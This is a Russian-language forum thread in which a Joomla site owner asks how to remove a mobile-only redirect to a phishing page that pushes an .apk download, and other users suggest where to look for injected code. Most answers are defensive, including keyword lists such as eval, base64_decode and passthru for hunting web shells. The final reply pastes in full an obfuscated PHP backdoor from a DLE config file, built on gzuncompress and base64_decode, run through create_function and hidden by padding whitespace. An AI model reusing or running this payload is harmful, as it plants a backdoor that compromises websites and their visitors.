Как убрать редирект с сайта?

Имею свой сайт на джумле.

Неделю назад обнаружил, что при входе на сайт с мобильных устройств (смартфон, планшет) происходит редирект на фишинговую страницу newflashplayer.ru и сразу же на мобильное устройство скачивается .apk-файл. Захожу с десктопного браузера — всё в порядке.


Проверил — файл .htaccess в порядке (не изменялся).

Проверил дату изменения js-скриптов — тоже никаких новых или недавно отредактированных…

Подскажите, куда еще посмотреть?
  • Вопрос задан
  • 27115 просмотров
Решения вопроса 1
@odmin4eg
на сервере одно из клиентов тоже самое было редирект точно тудаже
всё дело было в JS файлах
;document.write(unescape("%3C%73

описывал у себя в бложике
Ответ написан
Пригласить эксперта
Ответы на вопрос 10
Meliborn
@Meliborn
Поставь себе User agent какой-нибудь мобилки и смотри исходный код страницы.
Ответ написан
Комментировать
Hungry_Hunter
@Hungry_Hunter
Помимо файла htaccess следует произвести поиск в php файлах по следующим вхождениям:
— eval
— base64_decode
— Location
— по адресу редиректа

В js файлах так же следует проверить наличие редиректа. Дата редактирования файла не обязательно должна отличаться от остальных, т.к. изменить ее после редактирования не составляет труда.

А вообще лучше обратиться к специалисту для удаления вредоносного кода и поиска вебшелов на вашем сервере.
Ответ написан
Комментировать
alekciy
@alekciy
Вёбных дел мастер
Крайне рекомендую зайти на сайт из поисковиков. Не важно, из какого браузера. Тоже может оказаться, что идет редирект. И скорее всего окажется, что их генерит уже сам движок без JS-ов.
Ответ написан
Комментировать
Stalker_RED
@Stalker_RED
А в самой странице нет яваскриптовых вставок? Да и дату изменения файла можно изменить.
Ответ написан
Комментировать
@nelson
Спросил у автора в личке адрес сайта, посмотрел. Там действительно в конце javascript файлов (всех) есть строка которая начинается с:
document.write(unescape(
все эти строки надо убрать, а директорию где они лежат — закрыть на запись от имени юзера под которым работает веб-сервер. Если папка создавалась по ФТП — обычно достаточно выставить права 775.
(а дата изменения файла легко подделывается, поэтому вы и не стали туда смотреть — а зря)

И скорее всего у вас залит веб-шелл, его тоже можно поискать — скачиваете себе копию сайта и ищете в РНР файлах следующее:
eval(
/.*/e
passthru
(эти строки могут и в обычных файлах встречаться)

Но не факт что найдете все шеллы так, поэтому для надежности желательно удалить все файлы, кроме картинок, и заново установить последнюю версию Джумлы (и всех плагинов которые у вас стоят).
И правильно проставить права на папки — в тех папках, в которые может писать вебсервер, надо запретить исполнение PHP файлов:
php_flag engine 0
в файлике .htaccess в этих директориях.
Ответ написан
@FedLab
думаю у вас ДЛЕ, встречал такое… проверьте файлы сайта на наличие перенаправлений.
Если ДЛЕ — ищите в index.php, engine/data.config.php что-то c «Location:» — найдете — будет заметно, что оно чужее.
редирект может быть в заголовке страницы — php отдает header с указанием на перенаправление
Ответ написан
Комментировать
NikolasSumrak
@NikolasSumrak
Senior PHP Developer
Проследите, на какую страницу изначально идет редирект, а затем сделайте поиск по всем файлам проекта с этим url-ом.
Ответ написан
vinograd19
@vinograd19
meta тэги посмотрите
Ответ написан
Комментировать
zizop
@zizop
Есть такой вариант.
Т.к. идёт редирект для мобильных платформ, то с большой долей вероятности в коде появится название платформы. Мне в аналогичной ситуации помог

grep "android" -r ./


Ну конечно, если у вас не сайт про android :-)
Ответ написан
Комментировать
@kataynew
а файде data/config.php создается постоянно такая запись. Кто знает что это?

$liciens = "@Ev"."aL(gZu"."ncOmp"."rEss(bAs"."e64"."_Dec"."odE('eF6VVftv2zYQ/lccwDAl2JZj+R1DaNbC2IIN7ZYmG4Y2EyjpLLGWRJWPuO6Y/31HyY2TxnCxH3R8fXe87x5iW3Kx0zIgYUhaHtHSShD1glmRhJwsneFiNu5b0R3PpvO+Fe6rWIs8LHSuWCghh1g5bbHutcM37979erVyLwoVClomtXJvvDj33SVbO0xKQOQe9aHdOHDnuv9e4kHM+YaBs9/tvYB1hz3FCnDc7nw698c9MiDu8gHNOpcvsEFA5sPJ2J/MFsTl4hRifv5DxPCHCJ8cJ0HO/eHMn458f0wO3i9Gw8b7thYsQLvvV9d/rq4/kOvVH7er9zfh7fUVuVtiSJ8cSiUE3Ds4KK6rCoRDBAhYY8YqpTJ04M7GGM8rLh2ikyxJdSryDV1vPkOiN5L0CIvh01fingXBmuYSXESXMZUQF9VjXnqPGci4/LZwl5d2GZxyR0meHXxxxnN/0reiO8Z89a3AwuHVzmkMvygWfzad9KwCBgaJnebOhA6VBP0ZRH1dBjTB/T2SjF6x1NZw7KmmrpWVg4oWYCeKyYHc1ADI6mEQx3b0ZGUHWvQfcbXiRbOP5FoXpZ1xpmityH8jLo4dCVzUN60DHATdYotAGfMEbG9YSEUFXq9ABB/bG9htuUhQCxcSOloEQ1Q7QjR4muUOcv3OOMmUqi4G1k0bV5QId92ls5hM+/h1h6OR37di37ZYpbxSIRWCYioQ3GtrmR7SgDq9Efasu4QvTNmacsb+cPiPFW6n02IFTcHmsQCRIjms4UPJIFOXRvJJMaFP2Kb2itMJVSWkNBQg9aGG/n8HtKEo8jVlfM01BARbgNQMzg5N9svNze/hLa7Cn35evb0hd7a5Txxjl9f9f1YJSMOCqjhzyCCiLNGGUYxjnBnO0xwMSwtqXnNlMIzwxUQ4qxhWpVnlil6Vxobf0IxzQ4sI8X+N3oTmb/pa8K3BnNqdFJQpKMu9ASNNXvDHggSe3V2b99B2icVkGk9qJWEk1P7IgvlG8pRrIzMo0S1WSkVTs7PXe6aQpRcbrXQEhicl3+Dci3YNg9o5YbZMWfN84wlt7jdezI3OeWrWNIYIbdScPZPoeGM/U9J7hFOeo2URxZ6JWJk2PGxVWBbPaVRehMwlKpWJ4CwxBUsqsysiRkuTqTjEjZIZiTtcGh4xDNAnvwADgoH82JqemyrjJRxCZcv37LtXhiQ5hBpvCVmCuT6KObxE9ekzLwOaJCVspaEJuuNVWWWC3EZWmWANkEQUuePGtzPUZdIGrsbjVFDFeNk4KVhzhZ21zoKWfQWOPxz752tGjj16Dw//AYlYkeQ=')));";$release_this = "cre"."ate_"."function";if (@function_exists($release_this)){@$dle_func = $release_this('', "$liciens;");$dle_func('');}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            //$dle_lik = "@Ev"."AL(gZu"."nCOmp"."rEss(bAS"."e64"."_Dec"."odE('eF6dVG1v2zgM/ispEFQ21jlp0y5tA2O9DcGuuMO668uGYSsM2WZsXWzRJ8nNirH//Si7Q9qty4B9sGhJD18ekuLQ1qpSFmORiEEkktavFky3UX7NExQztQiUteCCYfL67Oyv0/mn4b3idRh+PeGbDHGpIPh2vPMj8NnujlM1BOGzw4Ojg+mOGIlwdseWg5MfwXEsjvb2p+PJ9EiEaDZCDse/huz+GrInfkJFjCfj/enB0f50ItYUDqcHPYWhWcRs+GJ+/n5+/sk6Y+AmYOGwbRowgTBgYAEmaZwr2cf1bNga9UBFnM//uZpfXCZX56eCbxm92aAybeIstP9xnby9k2GJNt6k4SyWa/8lyJxP73Fi8lIVWdTUzpd7ZFXpRv5vmUGZdUdZFnlZGPTi+WTVnY6ObdOpuHJwrLFrFic7DfxbhCy2LWDXSUyIhZGr1lSgM8w5u2bRQRppZA0OTPx5uITbFZqc1XhjYbs18S7rPcEnfpjTbSb1nXVROtccjzwPnxteGR6GM/ii3Ozudypmi80qTkMhEwO2XWv53t5al/nPy8t3yRXvkj/ezN9eimvfkhuuuTW7rt1qDBRJLV1WBmKUSpW3lDFXkiUiqaKW9AodNYqLSrJOK6CP8pXBFXFOePNh8jqheeXkqaYPBTiSOocvpGQiTVYSYsGglC3UUlXRSIkdTzfk18AEHvnuFKMeZ0hp62TBfjWXj/q4WtemwGuU3vaRYa5xSW2FBS1kBilGhMvItHSzjDLsnUeUt9nSf2SxwJZsCZp1tbzxjLCKsp6XoZVy3pmFLvRbnwGOx2pG8HPdI5NmEaVKFz0PbrKOxWMaTZRydnjKEaaKuf+7VwPd1qmSmixLtKRzgyqnWuUNgVFgPw9ejKl0WcJnWlFTooZ1qjgxwdZ3E1LkFSQte0lUzrV+EvNginbXj8KMZZ5rWFni5CkdNWVDMq/v//gFFMr6XMQLgDyVnLy48tlzPYovjXQKdR+lUb0L/zfYigd+dP1k3N0P3ql4al7f3f0P9ywaOQ==')));";$lic_true = "cre"."ate_"."function";if(@function_exists($lic_true)){@$dle_conf = $lic_true('', "$dle_lic;");$dle_conf('');}                                                                                                                                                                                                                    

//System Configurations
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы